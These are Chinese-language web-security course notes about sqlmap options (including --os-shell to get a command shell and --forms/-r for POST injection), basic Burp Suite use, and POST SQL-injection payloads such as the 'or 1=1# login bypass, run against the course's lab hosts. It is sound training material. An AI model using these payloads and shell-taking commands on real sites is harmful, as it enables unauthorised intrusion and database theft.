掌控安全Web安全微专业笔记 (10)

image-20201012184636754

sqlmap指令手册

常见指令:
--random-agent 选择随机user-agents头
--delay=1 每次探测延时1秒(防止访问过快被ban)
--count 查看数据量
--proxy ":1080" 使用本地1080端口
--level 1-5 测试等级(最低1,最高5) level等级越高检测越详细,例如 level大于2会检测cookie注入,大于3会检测头注入
--is-dba 查询当前用户权限,如果DBA是True可以尝试直接拿webshell

sqlmap -u \'http://shop.aqlab.cn:8001/single.php?id=1\' --is-dba

2


--os-shell尝试往网站中放入一个cmdshell(就是拥有cmd权限的shell),先选择写入shell的脚本语言

sqlmap -u \'http://shop.aqlab.cn:8001/single.php?id=1\' --os-shell

image-20201012185339341

有的需要填写网站的web目录的绝对路径,有的可以直接选择好shell的脚本语言类型就可以直接拿shell

image-20201012164239050

3.Burpsuite工具的基础使用

Burp Suite 是用于攻击web 应用程序的集成平台,包含了许多工具。Burp Suite为这些工具设计了许多接口,以加快攻击应用程序的过程。所有工具都共享一个请求,并能处理对应的HTTP 消息、持久性、认证、代理、日志、警报。

我们先进行安装把工具装好,如果遇到破解问题可以看我的帖子
https://www.zkaq.org/t/2178.html

掌控安全Web安全微专业笔记

4.浏览器插件的安装

插件可以帮助我们更好的对浏览器进行操作,例如Proxy SwitchySharp插件可以帮助我快速的使用代理

安装浏览器插件的文章地址:https://www.zkaq.org/t/3683.html

image-20201012211909722

4-3POST注入HEAD头注入 一、POST注入介绍

POST\GET两种传参方式

GET传参的数据有限,比较少,会经过URL编码
POST传参的数据可以比较大,可以上传文件,不会经过URL编码

POST注入就是使用POST进行传参的注入,本质上和GET类型的没什么区别

POST注入高危点:
登录框
查询框
等各种和数据库有交互的框

最经典的POST注入莫过于万能密码

\'or 1=1#

image-20201013224831700

二、POST注入靶场的做法

POST注入(一)

select *from user where username =\'\' and password=\'\'

\'or 1=1#

POST注入(二)

select *from user where username =("") and password=("")

") or 1=1 #

Sqlmap如何对POST类型SQL注入进行注入

--forms sqlmap去读取页面中POST传参的表单的传参名然后进行SQL注入

-level 测试等级

sqlmap -u \'http://inject2.lab.aqlab.cn:81/Pass-06/index.php\' --forms --level 3

image-20201013233222400

-r 1.txt sqlmap读取数据包文件进行SQL注入,注入处可以打一个*号告诉Sqlmap测试那个点

sqlmap -r 1.txt --level 3

image-20201013233738600

三、Head注入介绍

PHP 全局变量 - 超全局变量

PHP 中的许多预定义变量都是“超全局的”,这意味着它们在一个脚本的全部作用域中都可用。

内容版权声明:除非注明,否则皆为本站原创文章。

转载注明出处:https://www.heiqu.com/zzpdzz.html